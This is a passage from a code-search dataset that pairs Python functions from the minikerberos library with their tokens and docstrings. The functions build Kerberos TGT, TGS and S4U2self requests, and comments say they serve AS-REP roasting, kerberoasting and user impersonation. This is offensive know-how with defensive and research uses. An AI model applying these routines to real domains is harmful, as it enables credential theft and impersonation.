ip, port = addr.split(':')
return KerberosSocket(ip, port = int(port), soc_type = soc_type) | python | def from_connection_string(s, soc_type = KerberosSocketType.TCP):
"""
<credentials>@<ip_or_hostname>:<port>
"""
ip = None
port = 88
t, addr = s.rsplit('@')
if addr.find(':') == -1:
ip = addr
else:
ip, port = addr.split(':')
return KerberosSocket(ip, port = int(port), soc_type = soc_type) | [
"def",
"from_connection_string",
"(",
"s",
",",
"soc_type",
"=",
"KerberosSocketType",
".",
"TCP",
")",
":",
"ip",
"=",
"None",
"port",
"=",
"88",
"t",
",",
"addr",
"=",
"s",
".",
"rsplit",
"(",
"'@'",
")",
"if",
"addr",
".",
"find",
"(",
"':'",
")",
"==",
"-",
"1",
":",
"ip",
"=",
"addr",
"else",
":",
"ip",
",",
"port",
"=",
"addr",
".",
"split",
"(",
"':'",
")",
"return",
"KerberosSocket",
"(",
"ip",
",",
"port",
"=",
"int",
"(",
"port",
")",
",",
"soc_type",
"=",
"soc_type",
")"
] | <credentials>@<ip_or_hostname>:<port> | [
"<credentials",
">"
] | train | https://github.com/skelsec/minikerberos/blob/caf14c1d0132119d6e8a8f05120efb7d0824b2c6/minikerberos/communication.py#L42-L55 |
skelsec/minikerberos | minikerberos/communication.py | KerbrosComm.from_tgt | def from_tgt(ksoc, tgt, key):
"""
Sets up the kerberos object from tgt and the session key.
Use this function when pulling the TGT from ccache file.
"""
kc = KerbrosComm(None, ksoc)
kc.kerberos_TGT = tgt
kc.kerberos_cipher_type = key['keytype']
kc.kerberos_session_key = Key(kc.kerberos_cipher_type, key['keyvalue'])
kc.kerberos_cipher = _enctype_table[kc.kerberos_cipher_type]
return kc | python | def from_tgt(ksoc, tgt, key):
"""
Sets up the kerberos object from tgt and the session key.
Use this function when pulling the TGT from ccache file.
"""
kc = KerbrosComm(None, ksoc)
kc.kerberos_TGT = tgt
kc.kerberos_cipher_type = key['keytype']
kc.kerberos_session_key = Key(kc.kerberos_cipher_type, key['keyvalue'])
kc.kerberos_cipher = _enctype_table[kc.kerberos_cipher_type]
return kc | [
"def",
"from_tgt",
"(",
"ksoc",
",",
"tgt",
",",
"key",
")",
":",
"kc",
"=",
"KerbrosComm",
"(",
"None",
",",
"ksoc",
")",
"kc",
".",
"kerberos_TGT",
"=",
"tgt",
"kc",
".",
"kerberos_cipher_type",
"=",
"key",
"[",
"'keytype'",
"]",
"kc",
".",
"kerberos_session_key",
"=",
"Key",
"(",
"kc",
".",
"kerberos_cipher_type",
",",
"key",
"[",
"'keyvalue'",
"]",
")",
"kc",
".",
"kerberos_cipher",
"=",
"_enctype_table",
"[",
"kc",
".",
"kerberos_cipher_type",
"]",
"return",
"kc"
] | Sets up the kerberos object from tgt and the session key.
Use this function when pulling the TGT from ccache file. | [
"Sets",
"up",
"the",
"kerberos",
"object",
"from",
"tgt",
"and",
"the",
"session",
"key",
".",
"Use",
"this",
"function",
"when",
"pulling",
"the",
"TGT",
"from",
"ccache",
"file",
"."
] | train | https://github.com/skelsec/minikerberos/blob/caf14c1d0132119d6e8a8f05120efb7d0824b2c6/minikerberos/communication.py#L138-L149 |
skelsec/minikerberos | minikerberos/communication.py | KerbrosComm.get_TGT | def get_TGT(self, override_etype = None, decrypt_tgt = True):
"""
decrypt_tgt: used for asreproast attacks
Steps performed:
1. Send and empty (no encrypted timestamp) AS_REQ with all the encryption types we support
2. Depending on the response (either error or AS_REP with TGT) we either send another AS_REQ with the encrypted data or return the TGT (or fail miserably)
3. PROFIT
"""
logger.debug('Generating initial TGT without authentication data')
now = datetime.datetime.utcnow()
kdc_req_body = {}
kdc_req_body['kdc-options'] = KDCOptions(set(['forwardable','renewable','proxiable']))
kdc_req_body['cname'] = PrincipalName({'name-type': NAME_TYPE.PRINCIPAL.value, 'name-string': [self.usercreds.username]})
kdc_req_body['realm'] = self.usercreds.domain.upper()
kdc_req_body['sname'] = PrincipalName({'name-type': NAME_TYPE.PRINCIPAL.value, 'name-string': ['krbtgt', self.usercreds.domain.upper()]})
kdc_req_body['till'] = now + datetime.timedelta(days=1)
kdc_req_body['rtime'] = now + datetime.timedelta(days=1)
kdc_req_body['nonce'] = secrets.randbits(31)
if override_etype is None:
kdc_req_body['etype'] = self.usercreds.get_supported_enctypes()
else:
kdc_req_body['etype'] = override_etype
pa_data_1 = {}
pa_data_1['padata-type'] = int(PADATA_TYPE('PA-PAC-REQUEST'))
pa_data_1['padata-value'] = PA_PAC_REQUEST({'include-pac': True}).dump()
kdc_req = {}
kdc_req['pvno'] = krb5_pvno
kdc_req['msg-type'] = MESSAGE_TYPE.KRB_AS_REQ.value
kdc_req['padata'] = [pa_data_1]
kdc_req['req-body'] = KDC_REQ_BODY(kdc_req_body)
req = AS_REQ(kdc_req)
logger.debug('Sending initial TGT to %s' % self.ksoc.get_addr_str())
rep = self.ksoc.sendrecv(req.dump(), throw = False)
if rep.name != 'KRB_ERROR':
#user can do kerberos auth without preauthentication!
self.kerberos_TGT = rep.native
#if we want to roast the asrep (tgt rep) part then we dont even have the proper keys to decrypt
#so we just return, the asrep can be extracted from this object anyhow
if decrypt_tgt == False:
return
self.kerberos_cipher = _enctype_table[23]
self.kerberos_cipher_type = 23
self.kerberos_key = Key(self.kerberos_cipher.enctype, self.usercreds.get_key_for_enctype(EncryptionType.ARCFOUR_HMAC_MD5))
else:
if rep.native['error-code'] != KerberosErrorCode.KDC_ERR_PREAUTH_REQUIRED.value:
raise KerberosError(rep)
rep = rep.native
logger.debug('Got reply from server, asikg to provide auth data')
rep = self.do_preauth(rep)
logger.debug('Got valid TGT response from server')
rep = rep.native
self.kerberos_TGT = rep
cipherText = rep['enc-part']['cipher']
temp = self.kerberos_cipher.decrypt(self.kerberos_key, 3, cipherText)
self.kerberos_TGT_encpart = EncASRepPart.load(temp).native
self.kerberos_session_key = Key(self.kerberos_cipher.enctype, self.kerberos_TGT_encpart['key']['keyvalue'])
self.ccache.add_tgt(self.kerberos_TGT, self.kerberos_TGT_encpart, override_pp = True)
logger.debug('Got valid TGT')
return | python | def get_TGT(self, override_etype = None, decrypt_tgt = True):
"""
decrypt_tgt: used for asreproast attacks
Steps performed:
1. Send and empty (no encrypted timestamp) AS_REQ with all the encryption types we support
2. Depending on the response (either error or AS_REP with TGT) we either send another AS_REQ with the encrypted data or return the TGT (or fail miserably)
3. PROFIT
"""
logger.debug('Generating initial TGT without authentication data')
now = datetime.datetime.utcnow()
kdc_req_body = {}
kdc_req_body['kdc-options'] = KDCOptions(set(['forwardable','renewable','proxiable']))
kdc_req_body['cname'] = PrincipalName({'name-type': NAME_TYPE.PRINCIPAL.value, 'name-string': [self.usercreds.username]})
kdc_req_body['realm'] = self.usercreds.domain.upper()
kdc_req_body['sname'] = PrincipalName({'name-type': NAME_TYPE.PRINCIPAL.value, 'name-string': ['krbtgt', self.usercreds.domain.upper()]})
kdc_req_body['till'] = now + datetime.timedelta(days=1)
kdc_req_body['rtime'] = now + datetime.timedelta(days=1)
kdc_req_body['nonce'] = secrets.randbits(31)
if override_etype is None:
kdc_req_body['etype'] = self.usercreds.get_supported_enctypes()
else:
kdc_req_body['etype'] = override_etype
pa_data_1 = {}
pa_data_1['padata-type'] = int(PADATA_TYPE('PA-PAC-REQUEST'))
pa_data_1['padata-value'] = PA_PAC_REQUEST({'include-pac': True}).dump()
kdc_req = {}
kdc_req['pvno'] = krb5_pvno
kdc_req['msg-type'] = MESSAGE_TYPE.KRB_AS_REQ.value
kdc_req['padata'] = [pa_data_1]
kdc_req['req-body'] = KDC_REQ_BODY(kdc_req_body)
req = AS_REQ(kdc_req)
logger.debug('Sending initial TGT to %s' % self.ksoc.get_addr_str())
rep = self.ksoc.sendrecv(req.dump(), throw = False)
if rep.name != 'KRB_ERROR':
#user can do kerberos auth without preauthentication!
self.kerberos_TGT = rep.native
#if we want to roast the asrep (tgt rep) part then we dont even have the proper keys to decrypt
#so we just return, the asrep can be extracted from this object anyhow
if decrypt_tgt == False:
return
self.kerberos_cipher = _enctype_table[23]
self.kerberos_cipher_type = 23
self.kerberos_key = Key(self.kerberos_cipher.enctype, self.usercreds.get_key_for_enctype(EncryptionType.ARCFOUR_HMAC_MD5))
else:
if rep.native['error-code'] != KerberosErrorCode.KDC_ERR_PREAUTH_REQUIRED.value:
raise KerberosError(rep)
rep = rep.native
logger.debug('Got reply from server, asikg to provide auth data')
rep = self.do_preauth(rep)
logger.debug('Got valid TGT response from server')
rep = rep.native
self.kerberos_TGT = rep
cipherText = rep['enc-part']['cipher']
temp = self.kerberos_cipher.decrypt(self.kerberos_key, 3, cipherText)
self.kerberos_TGT_encpart = EncASRepPart.load(temp).native
self.kerberos_session_key = Key(self.kerberos_cipher.enctype, self.kerberos_TGT_encpart['key']['keyvalue'])
self.ccache.add_tgt(self.kerberos_TGT, self.kerberos_TGT_encpart, override_pp = True)
logger.debug('Got valid TGT')
return | [
"def",
"get_TGT",
"(",
"self",
",",
"override_etype",
"=",
"None",
",",
"decrypt_tgt",
"=",
"True",
")",
":",
"logger",
".",
"debug",
"(",
"'Generating initial TGT without authentication data'",
")",
"now",
"=",
"datetime",
".",
"datetime",
".",
"utcnow",
"(",
")",
"kdc_req_body",
"=",
"{",
"}",
"kdc_req_body",
"[",
"'kdc-options'",
"]",
"=",
"KDCOptions",
"(",
"set",
"(",
"[",
"'forwardable'",
",",
"'renewable'",
",",
"'proxiable'",
"]",
")",
")",
"kdc_req_body",
"[",
"'cname'",
"]",
"=",
"PrincipalName",
"(",
"{",
"'name-type'",
":",
"NAME_TYPE",
".",
"PRINCIPAL",
".",
"value",
",",
"'name-string'",
":",
"[",
"self",
".",
"usercreds",
".",
"username",
"]",
"}",
")",
"kdc_req_body",
"[",
"'realm'",
"]",
"=",
"self",
".",
"usercreds",
".",
"domain",
".",
"upper",
"(",
")",
"kdc_req_body",
"[",
"'sname'",
"]",
"=",
"PrincipalName",
"(",
"{",
"'name-type'",
":",
"NAME_TYPE",
".",
"PRINCIPAL",
".",
"value",
",",
"'name-string'",
":",
"[",
"'krbtgt'",
",",
"self",
".",
"usercreds",
".",
"domain",
".",
"upper",
"(",
")",
"]",
"}",
")",
"kdc_req_body",
"[",
"'till'",
"]",
"=",
"now",
"+",
"datetime",
".",
"timedelta",
"(",
"days",
"=",
"1",
")",
"kdc_req_body",
"[",
"'rtime'",
"]",
"=",
"now",
"+",
"datetime",
".",
"timedelta",
"(",
"days",
"=",
"1",
")",
"kdc_req_body",
"[",
"'nonce'",
"]",
"=",
"secrets",
".",
"randbits",
"(",
"31",
")",
"if",
"override_etype",
"is",
"None",
":",
"kdc_req_body",
"[",
"'etype'",
"]",
"=",
"self",
".",
"usercreds",
".",
"get_supported_enctypes",
"(",
")",
"else",
":",
"kdc_req_body",
"[",
"'etype'",
"]",
"=",
"override_etype",
"pa_data_1",
"=",
"{",
"}",
"pa_data_1",
"[",
"'padata-type'",
"]",
"=",
"int",
"(",
"PADATA_TYPE",
"(",
"'PA-PAC-REQUEST'",
")",
")",
"pa_data_1",
"[",
"'padata-value'",
"]",
"=",
"PA_PAC_REQUEST",
"(",
"{",
"'include-pac'",
":",
"True",
"}",
")",
".",
"dump",
"(",
")",
"kdc_req",
"=",
"{",
"}",
"kdc_req",
"[",
"'pvno'",
"]",
"=",
"krb5_pvno",
"kdc_req",
"[",
"'msg-type'",
"]",
"=",
"MESSAGE_TYPE",
".",
"KRB_AS_REQ",
".",
"value",
"kdc_req",
"[",
"'padata'",
"]",
"=",
"[",
"pa_data_1",
"]",
"kdc_req",
"[",
"'req-body'",
"]",
"=",
"KDC_REQ_BODY",
"(",
"kdc_req_body",
")",
"req",
"=",
"AS_REQ",
"(",
"kdc_req",
")",
"logger",
".",
"debug",
"(",
"'Sending initial TGT to %s'",
"%",
"self",
".",
"ksoc",
".",
"get_addr_str",
"(",
")",
")",
"rep",
"=",
"self",
".",
"ksoc",
".",
"sendrecv",
"(",
"req",
".",
"dump",
"(",
")",
",",
"throw",
"=",
"False",
")",
"if",
"rep",
".",
"name",
"!=",
"'KRB_ERROR'",
":",
"#user can do kerberos auth without preauthentication!",
"self",
".",
"kerberos_TGT",
"=",
"rep",
".",
"native",
"#if we want to roast the asrep (tgt rep) part then we dont even have the proper keys to decrypt",
"#so we just return, the asrep can be extracted from this object anyhow",
"if",
"decrypt_tgt",
"==",
"False",
":",
"return",
"self",
".",
"kerberos_cipher",
"=",
"_enctype_table",
"[",
"23",
"]",
"self",
".",
"kerberos_cipher_type",
"=",
"23",
"self",
".",
"kerberos_key",
"=",
"Key",
"(",
"self",
".",
"kerberos_cipher",
".",
"enctype",
",",
"self",
".",
"usercreds",
".",
"get_key_for_enctype",
"(",
"EncryptionType",
".",
"ARCFOUR_HMAC_MD5",
")",
")",
"else",
":",
"if",
"rep",
".",
"native",
"[",
"'error-code'",
"]",
"!=",
"KerberosErrorCode",
".",
"KDC_ERR_PREAUTH_REQUIRED",
".",
"value",
":",
"raise",
"KerberosError",
"(",
"rep",
")",
"rep",
"=",
"rep",
".",
"native",
"logger",
".",
"debug",
"(",
"'Got reply from server, asikg to provide auth data'",
")",
"rep",
"=",
"self",
".",
"do_preauth",
"(",
"rep",
")",
"logger",
".",
"debug",
"(",
"'Got valid TGT response from server'",
")",
"rep",
"=",
"rep",
".",
"native",
"self",
".",
"kerberos_TGT",
"=",
"rep",
"cipherText",
"=",
"rep",
"[",
"'enc-part'",
"]",
"[",
"'cipher'",
"]",
"temp",
"=",
"self",
".",
"kerberos_cipher",
".",
"decrypt",
"(",
"self",
".",
"kerberos_key",
",",
"3",
",",
"cipherText",
")",
"self",
".",
"kerberos_TGT_encpart",
"=",
"EncASRepPart",
".",
"load",
"(",
"temp",
")",
".",
"native",
"self",
".",
"kerberos_session_key",
"=",
"Key",
"(",
"self",
".",
"kerberos_cipher",
".",
"enctype",
",",
"self",
".",
"kerberos_TGT_encpart",
"[",
"'key'",
"]",
"[",
"'keyvalue'",
"]",
")",
"self",
".",
"ccache",
".",
"add_tgt",
"(",
"self",
".",
"kerberos_TGT",
",",
"self",
".",
"kerberos_TGT_encpart",
",",
"override_pp",
"=",
"True",
")",
"logger",
".",
"debug",
"(",
"'Got valid TGT'",
")",
"return"
] | decrypt_tgt: used for asreproast attacks
Steps performed:
1. Send and empty (no encrypted timestamp) AS_REQ with all the encryption types we support
2. Depending on the response (either error or AS_REP with TGT) we either send another AS_REQ with the encrypted data or return the TGT (or fail miserably)
3. PROFIT | [
"decrypt_tgt",
":",
"used",
"for",
"asreproast",
"attacks",
"Steps",
"performed",
":",
"1",
".",
"Send",
"and",
"empty",
"(",
"no",
"encrypted",
"timestamp",
")",
"AS_REQ",
"with",
"all",
"the",
"encryption",
"types",
"we",
"support",
"2",
".",
"Depending",
"on",
"the",
"response",
"(",
"either",
"error",
"or",
"AS_REP",
"with",
"TGT",
")",
"we",
"either",
"send",
"another",
"AS_REQ",
"with",
"the",
"encrypted",
"data",
"or",
"return",
"the",
"TGT",
"(",
"or",
"fail",
"miserably",
")",
"3",
".",
"PROFIT"
] | train | https://github.com/skelsec/minikerberos/blob/caf14c1d0132119d6e8a8f05120efb7d0824b2c6/minikerberos/communication.py#L215-L285 |
skelsec/minikerberos | minikerberos/communication.py | KerbrosComm.get_TGS | def get_TGS(self, spn_user, override_etype = None):
"""
Requests a TGS ticket for the specified user.
Retruns the TGS ticket, end the decrpyted encTGSRepPart.
spn_user: KerberosTarget: the service user you want to get TGS for.
override_etype: None or list of etype values (int) Used mostly for kerberoasting, will override the AP_REQ supported etype values (which is derived from the TGT) to be able to recieve whatever tgs tiecket
"""
#construct tgs_req
logger.debug('Constructing TGS request for user %s' % spn_user.get_formatted_pname())
now = datetime.datetime.utcnow()
kdc_req_body = {}
kdc_req_body['kdc-options'] = KDCOptions(set(['forwardable','renewable','renewable_ok', 'canonicalize']))
kdc_req_body['realm'] = spn_user.domain.upper()
kdc_req_body['sname'] = PrincipalName({'name-type': NAME_TYPE.SRV_INST.value, 'name-string': spn_user.get_principalname()})
kdc_req_body['till'] = now + datetime.timedelta(days=1)
kdc_req_body['nonce'] = secrets.randbits(31)
if override_etype:
kdc_req_body['etype'] = override_etype
else:
kdc_req_body['etype'] = [self.kerberos_cipher_type]
authenticator_data = {}
authenticator_data['authenticator-vno'] = krb5_pvno
authenticator_data['crealm'] = Realm(self.kerberos_TGT['crealm'])
authenticator_data['cname'] = self.kerberos_TGT['cname']
authenticator_data['cusec'] = now.microsecond
authenticator_data['ctime'] = now
authenticator_data_enc = self.kerberos_cipher.encrypt(self.kerberos_session_key, 7, Authenticator(authenticator_data).dump(), None)
ap_req = {}
ap_req['pvno'] = krb5_pvno
ap_req['msg-type'] = MESSAGE_TYPE.KRB_AP_REQ.value
ap_req['ap-options'] = APOptions(set())
ap_req['ticket'] = Ticket(self.kerberos_TGT['ticket'])
ap_req['authenticator'] = EncryptedData({'etype': self.kerberos_cipher_type, 'cipher': authenticator_data_enc})
pa_data_1 = {}
pa_data_1['padata-type'] = PaDataType.TGS_REQ.value
pa_data_1['padata-value'] = AP_REQ(ap_req).dump()
kdc_req = {}
kdc_req['pvno'] = krb5_pvno
kdc_req['msg-type'] = MESSAGE_TYPE.KRB_TGS_REQ.value
kdc_req['padata'] = [pa_data_1]
kdc_req['req-body'] = KDC_REQ_BODY(kdc_req_body)
req = TGS_REQ(kdc_req)
logger.debug('Constructing TGS request to server')
rep = self.ksoc.sendrecv(req.dump())
logger.debug('Got TGS reply, decrypting...')
tgs = rep.native
encTGSRepPart = EncTGSRepPart.load(self.kerberos_cipher.decrypt(self.kerberos_session_key, 8, tgs['enc-part']['cipher'])).native
key = Key(encTGSRepPart['key']['keytype'], encTGSRepPart['key']['keyvalue'])
self.ccache.add_tgs(tgs, encTGSRepPart)
logger.debug('Got valid TGS reply')
self.kerberos_TGS = tgs
return tgs, encTGSRepPart, key | python | def get_TGS(self, spn_user, override_etype = None):
"""
Requests a TGS ticket for the specified user.
Retruns the TGS ticket, end the decrpyted encTGSRepPart.
spn_user: KerberosTarget: the service user you want to get TGS for.
override_etype: None or list of etype values (int) Used mostly for kerberoasting, will override the AP_REQ supported etype values (which is derived from the TGT) to be able to recieve whatever tgs tiecket
"""
#construct tgs_req
logger.debug('Constructing TGS request for user %s' % spn_user.get_formatted_pname())
now = datetime.datetime.utcnow()
kdc_req_body = {}
kdc_req_body['kdc-options'] = KDCOptions(set(['forwardable','renewable','renewable_ok', 'canonicalize']))
kdc_req_body['realm'] = spn_user.domain.upper()
kdc_req_body['sname'] = PrincipalName({'name-type': NAME_TYPE.SRV_INST.value, 'name-string': spn_user.get_principalname()})
kdc_req_body['till'] = now + datetime.timedelta(days=1)
kdc_req_body['nonce'] = secrets.randbits(31)
if override_etype:
kdc_req_body['etype'] = override_etype
else:
kdc_req_body['etype'] = [self.kerberos_cipher_type]
authenticator_data = {}
authenticator_data['authenticator-vno'] = krb5_pvno
authenticator_data['crealm'] = Realm(self.kerberos_TGT['crealm'])
authenticator_data['cname'] = self.kerberos_TGT['cname']
authenticator_data['cusec'] = now.microsecond
authenticator_data['ctime'] = now
authenticator_data_enc = self.kerberos_cipher.encrypt(self.kerberos_session_key, 7, Authenticator(authenticator_data).dump(), None)
ap_req = {}
ap_req['pvno'] = krb5_pvno
ap_req['msg-type'] = MESSAGE_TYPE.KRB_AP_REQ.value
ap_req['ap-options'] = APOptions(set())
ap_req['ticket'] = Ticket(self.kerberos_TGT['ticket'])
ap_req['authenticator'] = EncryptedData({'etype': self.kerberos_cipher_type, 'cipher': authenticator_data_enc})
pa_data_1 = {}
pa_data_1['padata-type'] = PaDataType.TGS_REQ.value
pa_data_1['padata-value'] = AP_REQ(ap_req).dump()
kdc_req = {}
kdc_req['pvno'] = krb5_pvno
kdc_req['msg-type'] = MESSAGE_TYPE.KRB_TGS_REQ.value
kdc_req['padata'] = [pa_data_1]
kdc_req['req-body'] = KDC_REQ_BODY(kdc_req_body)
req = TGS_REQ(kdc_req)
logger.debug('Constructing TGS request to server')
rep = self.ksoc.sendrecv(req.dump())
logger.debug('Got TGS reply, decrypting...')
tgs = rep.native
encTGSRepPart = EncTGSRepPart.load(self.kerberos_cipher.decrypt(self.kerberos_session_key, 8, tgs['enc-part']['cipher'])).native
key = Key(encTGSRepPart['key']['keytype'], encTGSRepPart['key']['keyvalue'])
self.ccache.add_tgs(tgs, encTGSRepPart)
logger.debug('Got valid TGS reply')
self.kerberos_TGS = tgs
return tgs, encTGSRepPart, key | [
"def",
"get_TGS",
"(",
"self",
",",
"spn_user",
",",
"override_etype",
"=",
"None",
")",
":",
"#construct tgs_req",
"logger",
".",
"debug",
"(",
"'Constructing TGS request for user %s'",
"%",
"spn_user",
".",
"get_formatted_pname",
"(",
")",
")",
"now",
"=",
"datetime",
".",
"datetime",
".",
"utcnow",
"(",
")",
"kdc_req_body",
"=",
"{",
"}",
"kdc_req_body",
"[",
"'kdc-options'",
"]",
"=",
"KDCOptions",
"(",
"set",
"(",
"[",
"'forwardable'",
",",
"'renewable'",
",",
"'renewable_ok'",
",",
"'canonicalize'",
"]",
")",
")",
"kdc_req_body",
"[",
"'realm'",
"]",
"=",
"spn_user",
".",
"domain",
".",
"upper",
"(",
")",
"kdc_req_body",
"[",
"'sname'",
"]",
"=",
"PrincipalName",
"(",
"{",
"'name-type'",
":",
"NAME_TYPE",
".",
"SRV_INST",
".",
"value",
",",
"'name-string'",
":",
"spn_user",
".",
"get_principalname",
"(",
")",
"}",
")",
"kdc_req_body",
"[",
"'till'",
"]",
"=",
"now",
"+",
"datetime",
".",
"timedelta",
"(",
"days",
"=",
"1",
")",
"kdc_req_body",
"[",
"'nonce'",
"]",
"=",
"secrets",
".",
"randbits",
"(",
"31",
")",
"if",
"override_etype",
":",
"kdc_req_body",
"[",
"'etype'",
"]",
"=",
"override_etype",
"else",
":",
"kdc_req_body",
"[",
"'etype'",
"]",
"=",
"[",
"self",
".",
"kerberos_cipher_type",
"]",
"authenticator_data",
"=",
"{",
"}",
"authenticator_data",
"[",
"'authenticator-vno'",
"]",
"=",
"krb5_pvno",
"authenticator_data",
"[",
"'crealm'",
"]",
"=",
"Realm",
"(",
"self",
".",
"kerberos_TGT",
"[",
"'crealm'",
"]",
")",
"authenticator_data",
"[",
"'cname'",
"]",
"=",
"self",
".",
"kerberos_TGT",
"[",
"'cname'",
"]",
"authenticator_data",
"[",
"'cusec'",
"]",
"=",
"now",
".",
"microsecond",
"authenticator_data",
"[",
"'ctime'",
"]",
"=",
"now",
"authenticator_data_enc",
"=",
"self",
".",
"kerberos_cipher",
".",
"encrypt",
"(",
"self",
".",
"kerberos_session_key",
",",
"7",
",",
"Authenticator",
"(",
"authenticator_data",
")",
".",
"dump",
"(",
")",
",",
"None",
")",
"ap_req",
"=",
"{",
"}",
"ap_req",
"[",
"'pvno'",
"]",
"=",
"krb5_pvno",
"ap_req",
"[",
"'msg-type'",
"]",
"=",
"MESSAGE_TYPE",
".",
"KRB_AP_REQ",
".",
"value",
"ap_req",
"[",
"'ap-options'",
"]",
"=",
"APOptions",
"(",
"set",
"(",
")",
")",
"ap_req",
"[",
"'ticket'",
"]",
"=",
"Ticket",
"(",
"self",
".",
"kerberos_TGT",
"[",
"'ticket'",
"]",
")",
"ap_req",
"[",
"'authenticator'",
"]",
"=",
"EncryptedData",
"(",
"{",
"'etype'",
":",
"self",
".",
"kerberos_cipher_type",
",",
"'cipher'",
":",
"authenticator_data_enc",
"}",
")",
"pa_data_1",
"=",
"{",
"}",
"pa_data_1",
"[",
"'padata-type'",
"]",
"=",
"PaDataType",
".",
"TGS_REQ",
".",
"value",
"pa_data_1",
"[",
"'padata-value'",
"]",
"=",
"AP_REQ",
"(",
"ap_req",
")",
".",
"dump",
"(",
")",
"kdc_req",
"=",
"{",
"}",
"kdc_req",
"[",
"'pvno'",
"]",
"=",
"krb5_pvno",
"kdc_req",
"[",
"'msg-type'",
"]",
"=",
"MESSAGE_TYPE",
".",
"KRB_TGS_REQ",
".",
"value",
"kdc_req",
"[",
"'padata'",
"]",
"=",
"[",
"pa_data_1",
"]",
"kdc_req",
"[",
"'req-body'",
"]",
"=",
"KDC_REQ_BODY",
"(",
"kdc_req_body",
")",
"req",
"=",
"TGS_REQ",
"(",
"kdc_req",
")",
"logger",
".",
"debug",
"(",
"'Constructing TGS request to server'",
")",
"rep",
"=",
"self",
".",
"ksoc",
".",
"sendrecv",
"(",
"req",
".",
"dump",
"(",
")",
")",
"logger",
".",
"debug",
"(",
"'Got TGS reply, decrypting...'",
")",
"tgs",
"=",
"rep",
".",
"native",
"encTGSRepPart",
"=",
"EncTGSRepPart",
".",
"load",
"(",
"self",
".",
"kerberos_cipher",
".",
"decrypt",
"(",
"self",
".",
"kerberos_session_key",
",",
"8",
",",
"tgs",
"[",
"'enc-part'",
"]",
"[",
"'cipher'",
"]",
")",
")",
".",
"native",
"key",
"=",
"Key",
"(",
"encTGSRepPart",
"[",
"'key'",
"]",
"[",
"'keytype'",
"]",
",",
"encTGSRepPart",
"[",
"'key'",
"]",
"[",
"'keyvalue'",
"]",
")",
"self",
".",
"ccache",
".",
"add_tgs",
"(",
"tgs",
",",
"encTGSRepPart",
")",
"logger",
".",
"debug",
"(",
"'Got valid TGS reply'",
")",
"self",
".",
"kerberos_TGS",
"=",
"tgs",
"return",
"tgs",
",",
"encTGSRepPart",
",",
"key"
] | Requests a TGS ticket for the specified user.
Retruns the TGS ticket, end the decrpyted encTGSRepPart.
spn_user: KerberosTarget: the service user you want to get TGS for.
override_etype: None or list of etype values (int) Used mostly for kerberoasting, will override the AP_REQ supported etype values (which is derived from the TGT) to be able to recieve whatever tgs tiecket | [
"Requests",
"a",
"TGS",
"ticket",
"for",
"the",
"specified",
"user",
".",
"Retruns",
"the",
"TGS",
"ticket",
"end",
"the",
"decrpyted",
"encTGSRepPart",
"."
] | train | https://github.com/skelsec/minikerberos/blob/caf14c1d0132119d6e8a8f05120efb7d0824b2c6/minikerberos/communication.py#L287-L348 |
skelsec/minikerberos | minikerberos/communication.py | KerbrosComm.S4U2self | def S4U2self(self, user_to_impersonate, supp_enc_methods = [EncryptionType.DES_CBC_CRC,EncryptionType.DES_CBC_MD4,EncryptionType.DES_CBC_MD5,EncryptionType.DES3_CBC_SHA1,EncryptionType.ARCFOUR_HMAC_MD5,EncryptionType.AES256_CTS_HMAC_SHA1_96,EncryptionType.AES128_CTS_HMAC_SHA1_96]):
#def S4U2self(self, user_to_impersonate, spn_user, supp_enc_methods = [EncryptionType.DES_CBC_CRC,EncryptionType.DES_CBC_MD4,EncryptionType.DES_CBC_MD5,EncryptionType.DES3_CBC_SHA1,EncryptionType.ARCFOUR_HMAC_MD5,EncryptionType.AES256_CTS_HMAC_SHA1_96,EncryptionType.AES128_CTS_HMAC_SHA1_96]):
"""
user_to_impersonate : KerberosTarget class
"""
if not self.kerberos_TGT:
logger.debug('S4U2self invoked, but TGT is not available! Fetching TGT...')
self.get_TGT()
supp_enc = self.usercreds.get_preferred_enctype(supp_enc_methods)
auth_package_name = 'Kerberos'
now = datetime.datetime.utcnow()
###### Calculating authenticator data
authenticator_data = {}
authenticator_data['authenticator-vno'] = krb5_pvno
authenticator_data['crealm'] = Realm(self.kerberos_TGT['crealm'])
authenticator_data['cname'] = self.kerberos_TGT['cname']
authenticator_data['cusec'] = now.microsecond
authenticator_data['ctime'] = now
authenticator_data_enc = self.kerberos_cipher.encrypt(self.kerberos_session_key, 7, Authenticator(authenticator_data).dump(), None)
ap_req = {}
ap_req['pvno'] = krb5_pvno
ap_req['msg-type'] = MESSAGE_TYPE.KRB_AP_REQ.value
ap_req['ap-options'] = APOptions(set())
ap_req['ticket'] = Ticket(self.kerberos_TGT['ticket'])
ap_req['authenticator'] = EncryptedData({'etype': self.kerberos_cipher_type, 'cipher': authenticator_data_enc})
pa_data_auth = {}
pa_data_auth['padata-type'] = PaDataType.TGS_REQ.value
pa_data_auth['padata-value'] = AP_REQ(ap_req).dump()
###### Calculating checksum data
S4UByteArray = NAME_TYPE.PRINCIPAL.value.to_bytes(4, 'little', signed = False)
S4UByteArray += user_to_impersonate.username.encode()
S4UByteArray += user_to_impersonate.domain.encode()
S4UByteArray += auth_package_name.encode()
logger.debug('S4U2self: S4UByteArray: %s' % S4UByteArray.hex())
logger.debug('S4U2self: S4UByteArray: %s' % S4UByteArray)
chksum_data = _HMACMD5.checksum(self.kerberos_session_key, 17, S4UByteArray)
logger.debug('S4U2self: chksum_data: %s' % chksum_data.hex())
chksum = {}
chksum['cksumtype'] = int(CKSUMTYPE('HMAC_MD5'))
chksum['checksum'] = chksum_data
###### Filling out PA-FOR-USER data for impersonation
pa_for_user_enc = {}
pa_for_user_enc['userName'] = PrincipalName({'name-type': NAME_TYPE.PRINCIPAL.value, 'name-string': user_to_impersonate.get_principalname()})
pa_for_user_enc['userRealm'] = user_to_impersonate.domain
pa_for_user_enc['cksum'] = Checksum(chksum)
pa_for_user_enc['auth-package'] = auth_package_name
pa_for_user = {}
pa_for_user['padata-type'] = int(PADATA_TYPE('PA-FOR-USER'))
pa_for_user['padata-value'] = PA_FOR_USER_ENC(pa_for_user_enc).dump()
###### Constructing body
krb_tgs_body = {}
krb_tgs_body['kdc-options'] = KDCOptions(set(['forwardable','renewable','canonicalize']))
krb_tgs_body['sname'] = PrincipalName({'name-type': NAME_TYPE.UNKNOWN.value, 'name-string': [self.usercreds.username]})
krb_tgs_body['realm'] = self.usercreds.domain.upper()
krb_tgs_body['till'] = now + datetime.timedelta(days=1)
krb_tgs_body['nonce'] = secrets.randbits(31)
krb_tgs_body['etype'] = [supp_enc.value] #selecting according to server's preferences
krb_tgs_req = {}
krb_tgs_req['pvno'] = krb5_pvno
